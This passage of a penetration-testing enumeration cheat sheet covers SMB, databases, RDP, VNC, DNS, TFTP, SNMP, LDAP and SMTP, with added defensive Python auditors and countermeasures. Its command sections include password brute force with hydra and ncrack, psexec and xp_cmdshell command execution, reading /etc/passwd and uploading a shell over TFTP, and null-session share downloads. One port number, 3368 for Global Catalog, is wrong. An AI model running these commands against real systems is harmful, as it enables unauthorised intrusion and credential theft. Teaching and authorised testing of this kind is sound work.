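# one subnet-restricted export, one read-only export with two clients.
SAMPLE_EXPORTS = """\
# constructed /etc/exports
/srv/share   *(rw,sync,no_root_squash)
/home        10.0.0.0/24(rw,sync)
/srv/backup  backup.example.test(ro,sync,root_squash)  10.0.0.5(ro)
"""


def parse_exports(text):
    """Return [(path, client, set(options))]. A client with no parentheses gets
    the exportfs defaults (ro, root_squash), represented here as an empty set."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            client, _, opts = spec.partition("(")
            options = set(filter(None, opts.rstrip(")").split(",")))
            entries.append((path, client, options))
    return entries


def audit_exports(text):
    """Findings for exports that let a remote root keep uid 0 or that are
    reachable from any client."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash: remote root is not mapped to nobody"))
        if client == "*" or client.startswith("*."):
            findings.append((path, client, "wildcard client: export mountable from any host"))
        if "rw" in opts and "no_root_squash" in opts:
            findings.append((path, client, "rw + no_root_squash: remote root can write root-owned files"))
    return findings


if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} [{client}]: {finding}")
```

The fix for the flagged line is to drop no_root_squash (root_squash is the default) and replace `*` with the client subnet, as the /home line already does.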
139/445 - SMB
Checks
Check for null sessions
Check the permissions of users you already have
Check for passwords in files
Attempt brute force on enumerated users
Check for EternalBlue
Check samba version (if Linux)
Commands (Automated)
nmap scan
#general scan
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445
#vulnerability scan
nmap --script smb-vuln* -p 445 -oA nmap_smb_vulns $ip
Check samba versions
#save the code below as samba_version.sh, make it executable and run: ./samba_version.sh RHOST [RPORT]
#!/bin/bash
if [ -z "$1" ]; then echo "Usage: ./samba_version.sh RHOST [RPORT]"; exit 1; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
#sniff the Samba version string out of the session setup while smbclient connects (tap0 is the VPN interface, adjust to yours)
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$$"
echo "exit" | smbclient -L "$rhost" -p "$rport" -N 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""
enum4linux
enum4linux -a $ip
smbmap
#list general folders
smbmap -H $ip
#recursively list dirs and files
smbmap -R $sharename -H $ip
smbmap -R "Users" -H $ip -u Guest
#download a file
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
CrackMapExec
#check if you can connect through null sessions (check what rights you have on the shares)
cme smb $ip -u '' -p '' --shares
cme smb $ip -u '' -p '' --shares --port 139
#enumerate the users
#rid brute forcing
cme smb $ip -u "" -p "" --rid-brute
#active sessions
cme smb $ip -u '' -p '' --loggedon-users
#users in general
cme smb $ip -u '' -p '' --users
#enumerate the groups
#local groups
cme smb $ip -u '' -p '' --local-groups
#domain groups
cme smb $ip -u '' -p '' --groups
#check for the password policy
cme smb $ip -u "" -p "" --pass-pol
mount shares and inspect files manually
#smbclient
smbclient -L $ip
smbclient //$ip/tmp
smbclient \\\\192.168.1.105\\ipc$ -U john
smbclient //$ip/ipc$ -U john
#mounting the share
mkdir /mnt/targetshare
mount -t cifs '//172.16.20.88/ipc$' -o username=[username] /mnt/targetshare
brute force smb
hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f
#in OSCP the passwords are often equal to the username
hydra -L usernames.txt -P usernames.txt $ip smb -V -f
Gaining shell through psexec (user needs to be admin)
#copy script
cp /usr/share/doc/python-impacket/examples/psexec.py .
#specific command test
python psexec.py <username>:<pass>@10.11.1.227 whoami
#shell
rlwrap python psexec.py <username>:<pass>@10.11.1.227
#NOTE: be careful with exclamation marks in passwords, escape them: rottenadmin:P@ssword123\!@192.168.194.140
#through crackmapexec (didn't always work for me)
cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami
1433 - MSSQL
Checks
Try default credentials "sa:password"
Brute force creds
Check database content for new passwords
Check version for exploits
RCE
through xp_cmdshell functionality
through injecting payload in output file, placing it in webroot and triggering it through webapp
Commands
nmap
nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -oN 1433_nmap_mssql
credential brute force
nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip
manually logging in and gaining shell
#login
sqsh -S $ip -U sa -P password
sqsh -S $ip:27900 -U sa -P password
#execute commands
xp_cmdshell 'date'
go
3306 - MySQL
Checks
Try default credentials "root":""
Brute force credentials
Check database content for new passwords
Check version for exploits
Commands
nmap
nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -oN 3306_nmap_mysql $ip
try default password
mysql --host=$ip -u root -p
3389 - RDP
Checks
Check if you can login with default guest account and blank password
Check if you can brute force users
Check for BlueKeep
Commands
nmap
nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -oN 3389_nmap_rdp
manually login
rdesktop $ip
#Try default guest account "guest":""
rdesktop -u guest $ip -g 94%
Start brute force
ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip
5900 - VNC
Checks
check for easy VNC passwords
check for exploits for VNC version
brute force VNC password
Commands
nmap
nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC
VNC brute force on base password
hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc
UDP
53 - DNS
Checks
Try zone transfer
Brute force subdomains
Commands
do DNS lookup specifying the DNS server
nslookup
#set nameserver to ip of box
> server 10.10.10.13
#ask for dns of box ip address
> 10.10.10.13
subdomain enumeration / brute force
dig axfr @$ip test.htb
fierce -dns ext.recon.lan -dnsserver 172.16.90.53
gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
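The zone transfer described in the DNS Enumeration section and the `dig axfr` command above return every record in the zone when the server allows it; the defensive concern in the countermeasures list is private hostnames and RFC 1918 addresses showing up in a publicly served zone. The parser below is an added example, not from the page: it reads the record lines dig prints, detects whether the transfer completed, and lists the names that point into private address space. The zone output is constructed.

```python
import ipaddress

# Parse dig axfr output and flag RFC 1918 addresses in the transferred zone.
# The dig output below is constructed for this example.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed dig axfr output for a zone that leaks two internal hosts.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.1 <<>> axfr @10.10.10.13 test.htb
test.htb.            3600  IN  SOA  ns1.test.htb. admin.test.htb. 2024010101 3600 900 604800 86400
test.htb.            3600  IN  NS   ns1.test.htb.
ns1.test.htb.        3600  IN  A    10.10.10.13
www.test.htb.        3600  IN  A    203.0.113.10
intranet.test.htb.   3600  IN  A    192.168.1.20
test.htb.            3600  IN  SOA  ns1.test.htb. admin.test.htb. 2024010101 3600 900 604800 86400
;; XFR size: 6 records
"""


def parse_axfr(text):
    """Return [(name, ttl, rtype, rdata)] for every record line; dig's comment
    lines start with ';' and are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith(";"):
            continue
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":
            continue
        name, ttl, _cls, rtype, *rdata = fields
        records.append((name, int(ttl), rtype, " ".join(rdata)))
    return records


def transfer_succeeded(text):
    """A completed AXFR is bracketed by the same SOA record at start and end;
    a refused transfer prints only '; Transfer failed.' and no records."""
    soa = [r for r in parse_axfr(text) if r[2] == "SOA"]
    return len(soa) >= 2 and soa[0] == soa[-1]


def private_exposures(text):
    """(name, address) pairs whose A record points into RFC 1918 space, i.e.
    internal hosts that should not be visible in a publicly served zone."""
    exposed = []
    for name, _ttl, rtype, rdata in parse_axfr(text):
        if rtype != "A":
            continue
        addr = ipaddress.ip_address(rdata)
        if any(addr in net for net in RFC1918):
            exposed.append((name, rdata))
    return exposed


if __name__ == "__main__":
    print("transfer completed:", transfer_succeeded(SAMPLE_AXFR))
    for name, addr in private_exposures(SAMPLE_AXFR):
        print(f"private address in public zone: {name} -> {addr}")
```

Explicit RFC 1918 networks are used rather than ipaddress's is_private, which also counts documentation ranges such as 203.0.113.0/24 as private and would mis-flag the public record in the sample.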
69 - TFTP
Checks
search for files to find sensitive info like passwords
upload shells to trigger them in web app
Commands
nmap
nmap -sU -p 69 --script tftp-enum.nse $ip
Interact with TFTP protocol
#setup the connection
tftp 172.16.200.100
#get a file
tftp> get /etc/passwd
#upload reverse shell
tftp> put shell.php
automated search sensitive files (Metasploit)
msfconsole
use auxiliary/scanner/tftp/tftpbrute
set RHOSTS $ip
set DICTIONARY /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
run
161 - SNMP
Checks
Try the default community strings 'public' and 'private'
Enumerate version of OS/ users /processes
Commands
nmap
nmap -sU -p161 --script "snmp-*" $ip
scan range of ip addresses for snmp strings
#only try "public" and "private"
onesixtyone -i targets.list
#try 100+ community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip
enumerate information with known community string
# enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# enumerates running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1
Types of information enumerated by intruders:
Network Resource and shares
Users and Groups
Routing tables
Auditing and Service settings
Machine names
Applications and banners
SNMP and DNS details
Techniques for Enumeration
Extracting user names using email ID's
Extract information using the default password
Brute Force Active Directory
Extract user names using SNMP
Extract user groups from Windows
Extract information using DNS Zone transfer
Services and Port to Enumerate
TCP 53: DNS Zone transfer
TCP 135: Microsoft RPC Endpoint Mapper
TCP 137: NetBIOS Name Service
TCP 139: NetBIOS session Service (SMB over NetBIOS)
TCP 445: SMB over TCP (Direct Host)
UDP 161: SNMP
TCP/UDP 389: LDAP
TCP/UDP 3368: Global Catalog Service
TCP 25: Simple Mail Transfer Protocol (SMTP)
NetBIOS Enumeration
NetBIOS stands for Network Basic Input Output System. It Allows computer communication over a LAN and allows them to share files and printers.
NetBIOS names are used to identify network devices over TCP/IP (Windows). It must be unique on a network, limited to 16 characters where 15 characters are used for the device name and the 16th character is reserved for identifying the type of service running or name record type.
Attackers use the NetBIOS enumeration to obtain:
List of computers that belong to a domain
List of shares on the individual hosts on the network
Policies and passwords
Commands and tools used:
Nbtstat: utility used to find protocol statistics, NetBIOS name table and name cache details
Superscan: GUI tool used to enumerate windows machine
Net view: command line tool to identify shared resources on a network
SNMP Enumeration
SNMP (Simple Network Management Protocol) is an application layer protocol which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network. SNMP is a very common protocol found enabled on a variety of operating systems like Windows Server, Linux & UNIX servers as well as network devices like routers, switches etc.
SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system.
It consists of three major components:
Managed Device: A managed device is a device or a host (technically known as a node) which has the SNMP service enabled. These devices could be routers, switches, hubs, bridges, computers etc.
Agent: An agent can be thought of as a piece of software that runs on a managed device. Its primary job is to convert the information into SNMP compatible format for the smooth management of the network using SNMP protocol.
Network Management System (NMS): These are the software systems that are used for monitoring of the network devices.
An agent running on every SNMP device will be providing access to a read and writable database. The database is referred to as the management information base (MIB) which is organized hierarchically and is a virtual database containing a formal description of all the network objects identified by a specific object identifier (OID) that can be managed using SNMP. It's a giant repository of values and settings. There is a manager involved in the process, and the manager will query the agent for various details.
Community strings is a text string used to authenticate communications between the management stations and network devices on which SNMP agents are hosted. Community Strings travel in clear text over the network, hence are subject to network sniffing attacks. Community Strings are sent with every network packet exchanged between the node and management station.
Two types of community strings:
Read only: permits querying the device and reading information, but does not permit any change to the configuration. The default read-only community string is "public".
Read Write: permits changes to the device, so a connection with this string can modify the remote device's configuration. The default read-write community string is "private".
When community strings are left at the defaults, or set to easily guessed values, attackers simply try them, often against a whole address range at once, and use whatever the agent answers.
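The following is an added example, not code from the original page: it hand-builds an SNMPv1/v2c GetRequest for sysDescr.0 with the standard library only and then decodes it the way a sniffer would, which shows that the community string sits in clear text in every packet. The probe() helper is the only part that talks to the network and is not run by default; the target host and the OID are assumptions for illustration.

```python
"""SNMPv1/v2c GetRequest built by hand, plus the decoder a sniffer needs.
Added example; uses only plain BER (ASN.1) encoding as SNMP does."""
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"              # sysDescr.0, the usual first read
DEFAULT_COMMUNITIES = ("public", "private")  # the two defaults named above


def ber_len(n):
    """BER length: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    """One tag-length-value element."""
    return bytes([tag]) + ber_len(len(payload)) + payload


def encode_int(value):
    """BER INTEGER for non-negative values (all this example needs)."""
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:                  # keep the sign bit clear
        body = b"\x00" + body
    return tlv(0x02, body)


def encode_oid(dotted):
    """BER OBJECT IDENTIFIER: first two arcs merge, the rest are base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return tlv(0x06, bytes(out))


def build_get_request(community, oid=SYS_DESCR, request_id=1, version=0):
    """Message = SEQUENCE { version INTEGER, community OCTET STRING, GetRequest-PDU }.
    version 0 is SNMPv1, 1 is SNMPv2c; both carry the community in clear text."""
    varbind = tlv(0x30, encode_oid(oid) + tlv(0x05, b""))   # { OID, NULL }
    pdu = tlv(0xA0, encode_int(request_id) + encode_int(0)   # error-status
              + encode_int(0) + tlv(0x30, varbind))          # error-index, varbinds
    return tlv(0x30, encode_int(version) + tlv(0x04, community.encode()) + pdu)


def read_tlv(buf, pos):
    """Decode one element at buf[pos]; returns (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def extract_community(packet):
    """What a sniffer does with a captured v1/v2c datagram: version and
    community are the first two elements of the outer SEQUENCE."""
    tag, body, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, pos = read_tlv(body, 0)
    _, community, _ = read_tlv(body, pos)
    return int.from_bytes(version, "big"), community.decode(errors="replace")


def probe(host, communities=DEFAULT_COMMUNITIES, port=161, timeout=1.0):
    """Try each candidate community and return those the agent answered
    (an agent stays silent on a wrong community). Network code: only use
    against systems you are authorised to test."""
    found = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        for i, community in enumerate(communities, start=1):
            sock.sendto(build_get_request(community, request_id=i), (host, port))
            try:
                reply, _ = sock.recvfrom(4096)
            except socket.timeout:
                continue
            if extract_community(reply)[1] == community:
                found.append(community)
    return found


if __name__ == "__main__":
    pkt = build_get_request("public")
    print(pkt.hex())
    print("recovered from the wire:", extract_community(pkt))
```

The 40-byte request for sysDescr.0 contains the ASCII bytes of "public" immediately after the version integer, which is exactly what tools such as Wireshark or tcpdump display; SNMPv3 messages carry a user name and an authentication parameter instead, and with authPriv the PDU itself is encrypted.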
A few tools:
OpUtils Network Monitoring Toolset - http://www.manageengine.com
SolarWinds (a widely used network management suite whose discovery tools double as SNMP enumerators) - www.solarwinds.com
Command line tools: snmpwalk and snmpget (Net-SNMP), snmp-check, onesixtyone (fast community string guessing across many hosts)
Countermeasures:
Remove or disable SNMP agents on hosts that do not need them
Block UDP port 161 (and UDP 162, used for traps) at all perimeter network access devices
Restrict SNMP access to the IP addresses of the management stations (agent access lists or firewall rules)
Change the default community strings and use SNMPv3 with authentication and privacy (authPriv), which is the more secure option
The next two items are Windows null-session countermeasures and apply to NetBIOS/SMB enumeration rather than SNMP, but are commonly listed alongside it:
Implement the Group Policy security option called "Additional restrictions for anonymous connections"
Restrict access to null session pipes and null session shares, and use IPsec filtering
LDAP Enumeration
The Lightweight Directory Access Protocol is used to query and modify directory services such as Active Directory, OpenLDAP and others. A directory is organised in a hierarchical and logical format, rather like the levels of management and employees in a company. In Active Directory environments LDAP is closely tied to the Domain Name System: clients locate domain controllers through DNS SRV records, which gives integrated quick lookups and fast resolution of queries. LDAP runs on TCP port 389 (LDAPS on TCP 636; the Active Directory Global Catalog listens on TCP 3268 and 3269) and is specified in a set of RFCs (RFC 4510 and following). It is often possible to query the LDAP service, sometimes anonymously, to obtain a great deal of information that provides the tester with valid usernames, e-mail addresses and departmental details that can be used in a brute force or social engineering attack.
Tools:
Jxplorer - http://www.jxplorer.org/
LDAP Admin Tool - http://www.ldapsoft.com
ldapsearch (OpenLDAP command line client; the -x option performs a simple bind, anonymous when no credentials are given)
Countermeasures:
Disable anonymous binds and require authenticated binds (for example Kerberos or NTLM via SASL) so that only known users can query the directory.
By default, LDAP traffic is transmitted in clear text; use LDAPS (TCP 636) or StartTLS to encrypt it, and require LDAP signing.
Select a username different from your email address and enable account lockout.
NTP Enumeration
The Network Time Protocol synchronises time across a network, which is especially important when using directory services (Kerberos, for example, rejects tickets whose timestamps differ from the server clock by more than a few minutes). A number of public time servers throughout the world can be used to keep systems synced to each other. NTP uses UDP port 123. Through NTP enumeration you can gather information such as the list of hosts that have recently queried the NTP server, their IP addresses, system names, and the operating system and ntpd version of the server itself. This information is obtained by querying the NTP server, for example with ntpq (readvar, peers) or ntpdc (monlist, which on older ntpd versions returned the last 600 clients; it is disabled by default from ntpd 4.2.7p26 onwards because it was also abused for amplification attacks).
SMTP Enumeration
The Simple Mail Transfer Protocol is used to send and relay e-mail messages between mail servers, whereas POP3 and IMAP are used by clients to retrieve messages from a mailbox. To deliver a message, the sending server looks up the Mail Exchange (MX) records of the recipient's domain in DNS; if no MX record exists, it falls back to the domain's A (or AAAA) record (RFC 5321). SMTP generally runs on TCP port 25 (587 for authenticated submission, 465 for implicit TLS).
SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help of built-in SMTP commands:
VRFY - asks the server to confirm that a mailbox (user) exists.
EXPN - asks the server to expand an alias or mailing list into its actual delivery addresses.
RCPT TO - specifies a recipient of the message; a server that rejects unknown recipients at this stage reveals which local users exist even when VRFY and EXPN are disabled.
Tools:
NetScanTools Pro, smtp-user-enum (command line), Metasploit's auxiliary/scanner/smtp/smtp_enum module
Countermeasures:
Disable or restrict the VRFY and EXPN commands, and configure the SMTP server to respond identically to known and unknown recipients (for example by accepting and discarding or bouncing mail to unknown recipients later), so that RCPT TO cannot be used to enumerate users.
Don't expose information such as the mail relay systems in use, internal IP addresses or host names in banners and Received headers.
Disable the open relay feature.
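The following is an added example, not code from the original page: it runs the VRFY / EXPN / RCPT TO enumeration dialogue described above against two constructed stand-ins for a mail server, a talkative unhardened one and one configured with the countermeasures just listed, so that the difference in what the attacker learns is visible. The local users, aliases, domain names and reply texts are invented for the example; smtp_sender() is the real-socket equivalent and is the only part that touches the network.

```python
"""SMTP user enumeration dialogue against a constructed fake MTA.
Added example; fake_server/hardened_server stand in for a real server."""
import re
import socket

# Constructed directory of a fictitious mail server (not real data).
LOCAL_USERS = {"root", "alice", "bob"}
ALIASES = {"postmaster": "root", "staff": "alice, bob, carol@partner.example"}


def fake_server(command):
    """Answer one command the way a talkative, unhardened MTA does."""
    verb, _, arg = command.strip().partition(" ")
    verb = verb.upper()
    if verb == "HELO":
        return "250 mail.example.org"
    if verb == "VRFY":                      # confirms a mailbox
        return f"250 {arg} <{arg}@example.org>" if arg in LOCAL_USERS else "550 5.1.1 User unknown"
    if verb == "EXPN":                      # expands an alias or list
        return f"250 {ALIASES[arg]}" if arg in ALIASES else "550 5.1.1 Unknown list"
    if verb == "MAIL":
        return "250 2.1.0 Ok"
    if verb == "RCPT":                      # rejects unknown recipients early
        m = re.match(r"TO:<([^@>]+)@", arg, re.I)
        return "250 2.1.5 Ok" if m and m.group(1) in LOCAL_USERS else "550 5.1.1 Recipient address rejected"
    if verb in ("RSET", "NOOP"):
        return "250 2.0.0 Ok"
    if verb == "QUIT":
        return "221 2.0.0 Bye"
    return "502 5.5.2 Command not implemented"


def hardened_server(command):
    """Same server after the countermeasures: VRFY/EXPN give a non-answer
    and every recipient is accepted at RCPT TO (unknown ones bounce later)."""
    verb = command.strip().split(" ")[0].upper()
    if verb in ("VRFY", "EXPN"):
        return "252 2.5.2 Cannot verify user, will attempt delivery"
    if verb in ("RCPT", "MAIL", "HELO", "RSET", "NOOP"):
        return "250 2.0.0 Ok"
    return "221 2.0.0 Bye" if verb == "QUIT" else "502 5.5.2 Command not implemented"


def classify(reply):
    """Map an SMTP reply code to what it tells us about the probed name."""
    code = reply[:3]
    if code in ("250", "251"):
        return "valid"
    if code == "252":
        return "unverifiable"               # server refuses to say
    if code in ("550", "551", "553"):
        return "invalid"
    if code in ("500", "502"):
        return "disabled"                   # command not available
    return "unknown"


def expand_alias(send, alias):
    """EXPN: the delivery addresses behind a list, or None if refused."""
    reply = send(f"EXPN {alias}")
    return [a.strip() for a in reply[4:].split(",")] if reply.startswith("250") else None


def enumerate_users(send, candidates, domain="example.org"):
    """`send` takes one command line and returns the server's reply line.
    VRFY is tried first; if it is disabled or answers 252, fall back to
    RCPT TO, which every MTA must implement."""
    results = {}
    send("HELO scanner.example.net")
    use_rcpt = classify(send(f"VRFY {candidates[0]}")) in ("disabled", "unverifiable")
    if use_rcpt:
        send("MAIL FROM:<probe@scanner.example.net>")
    for user in candidates:
        reply = send(f"RCPT TO:<{user}@{domain}>") if use_rcpt else send(f"VRFY {user}")
        results[user] = classify(reply)
    send("QUIT")
    return results


def smtp_sender(host, port=25, timeout=5.0):
    """Build a `send` callable over a real TCP connection (not used offline).
    Only use against mail servers you are authorised to test."""
    sock = socket.create_connection((host, port), timeout=timeout)
    rfile = sock.makefile("r", encoding="ascii", errors="replace")

    def read_reply():
        while True:                         # skip continuation lines "250-..."
            line = rfile.readline().rstrip("\r\n")
            if len(line) < 4 or line[3] != "-":
                return line

    read_reply()                            # consume the banner

    def send(command):
        sock.sendall((command + "\r\n").encode("ascii"))
        return read_reply()
    return send


if __name__ == "__main__":
    names = ["root", "alice", "nobody", "www-data"]
    print("talkative MTA:", enumerate_users(fake_server, names))
    print("hardened MTA: ", enumerate_users(hardened_server, names))
```

Against the talkative server the dictionary separates real users from non-existent ones; against the hardened server every name comes back "valid" because RCPT TO accepts everything, so the attacker learns nothing and the bounce (or silent discard) happens out of band. Real MTAs also rate-limit or tarpit bursts of RCPT TO, which is why enumeration tools pace their requests.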
DNS Enumeration
DNS enumeration is the process of locating all the DNS servers of an organization and the records they hold. It yields host names, IP addresses, mail servers, name servers and often TXT records that reveal third-party services, which together give a map of potential target systems. The list of DNS records provides an overview of the resource record types (A, AAAA, CNAME, MX, NS, SOA, TXT, PTR, SRV) stored in the zone files of the Domain Name System. DNS implements a distributed, hierarchical and redundant database for information associated with Internet domain names and addresses.
A DNS zone transfer (AXFR, carried over TCP port 53) is used to replicate zone data from a primary to its secondary name servers or to back up zone files. A client sends a zone transfer request for a zone to a name server; if the server allows zone transfers from arbitrary hosts, all the DNS names and IP addresses in that zone are returned in human-readable text in a single response.
Tools:
nslookup
dig (dig axfr <zone> @<name server> requests a zone transfer)
maltego
dnsenum
dnsrecon
Countermeasures:
Restrict zone transfers to the IP addresses of trusted secondary name servers (allow-transfer in BIND) and refuse them from everyone else
Ensure that private host names and internal (RFC 1918) IP addresses are not published in the zones served by publicly accessible DNS servers; use split-horizon DNS for internal names
Use the registrar's premium registration services, such as registry lock and WHOIS privacy, so domain records cannot be hijacked and do not expose staff contact details
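The following is an added example, not code from the original page, for the zone transfer passage and the countermeasure about private host names above: it parses the answer section of a zone transfer as dig prints it, inventories the record types and flags A/AAAA records that point at internal (RFC 1918, loopback, IPv6 ULA) addresses, which is what a reviewer checks before a zone is published. SAMPLE_AXFR is a constructed listing for the fictitious zone example.org using documentation address ranges; run_axfr() shells out to a real dig and is the only part that touches the network.

```python
"""Parse a zone transfer (AXFR) result and flag what it leaks.
Added example; SAMPLE_AXFR is constructed, not a real zone."""
import ipaddress
import subprocess
from collections import defaultdict

# Constructed output in the format `dig +noall +answer axfr example.org @ns1.example.org` prints.
SAMPLE_AXFR = """\
example.org.              3600  IN  SOA  ns1.example.org. hostmaster.example.org. 2024010101 7200 3600 1209600 3600
example.org.              3600  IN  NS   ns1.example.org.
example.org.              3600  IN  NS   ns2.example.org.
example.org.              3600  IN  MX   10 mail.example.org.
example.org.              3600  IN  TXT  "v=spf1 include:_spf.example.net -all"
ns1.example.org.          3600  IN  A    203.0.113.2
ns2.example.org.          3600  IN  A    203.0.113.3
mail.example.org.         3600  IN  A    203.0.113.25
www.example.org.          3600  IN  A    203.0.113.10
intranet.example.org.     3600  IN  A    10.0.5.12
vpn-gw.example.org.       3600  IN  A    192.168.1.1
backup-dc01.example.org.  3600  IN  A    10.0.0.5
example.org.              3600  IN  SOA  ns1.example.org. hostmaster.example.org. 2024010101 7200 3600 1209600 3600
"""

# Address ranges that have no business in a public zone (RFC 1918, loopback, IPv6 ULA).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "fc00::/7", "::1/128")]


def parse_zone(text):
    """Turn dig's answer section into (name, type, rdata) tuples.
    The repeated SOA that terminates every AXFR is dropped."""
    records = []
    for line in text.splitlines():
        parts = line.split(None, 4)          # name ttl class type rdata
        if len(parts) < 5 or parts[2] != "IN":
            continue
        records.append((parts[0].rstrip("."), parts[3], parts[4].strip()))
    if len(records) > 1 and records[-1][1] == "SOA" and records[-1] == records[0]:
        records.pop()                        # closing SOA duplicates the opening one
    return records


def inventory(records):
    """Count records per type: a quick picture of what the zone exposes."""
    counts = defaultdict(int)
    for _, rtype, _ in records:
        counts[rtype] += 1
    return dict(counts)


def private_leaks(records):
    """A/AAAA records whose address is internal: host names that reveal
    internal infrastructure and should not be in a public zone."""
    leaks = []
    for name, rtype, rdata in records:
        if rtype not in ("A", "AAAA"):
            continue
        try:
            addr = ipaddress.ip_address(rdata)
        except ValueError:
            continue                         # malformed rdata, skip it
        if any(addr in net for net in INTERNAL_NETS):
            leaks.append((name, rdata))
    return leaks


def run_axfr(zone, nameserver):
    """Request the zone from a real name server (dig must be installed).
    Returns the parsed records, or [] when the transfer is refused.
    Only use against zones you are authorised to test."""
    out = subprocess.run(
        ["dig", "+noall", "+answer", "axfr", zone, "@" + nameserver],
        capture_output=True, text=True, timeout=30,
    ).stdout
    return parse_zone(out)


if __name__ == "__main__":
    recs = parse_zone(SAMPLE_AXFR)
    print("record types:", inventory(recs))
    for name, ip in private_leaks(recs):
        print(f"LEAK  {name:26s} -> {ip}")
```

On the sample zone the check reports intranet, vpn-gw and backup-dc01, three names that tell an attacker about the internal addressing plan and the presence of a VPN gateway and a domain controller even though none of the addresses is reachable from the Internet; the same function run over the output of run_axfr() against your own public name servers is a cheap regression test for the split-horizon countermeasure.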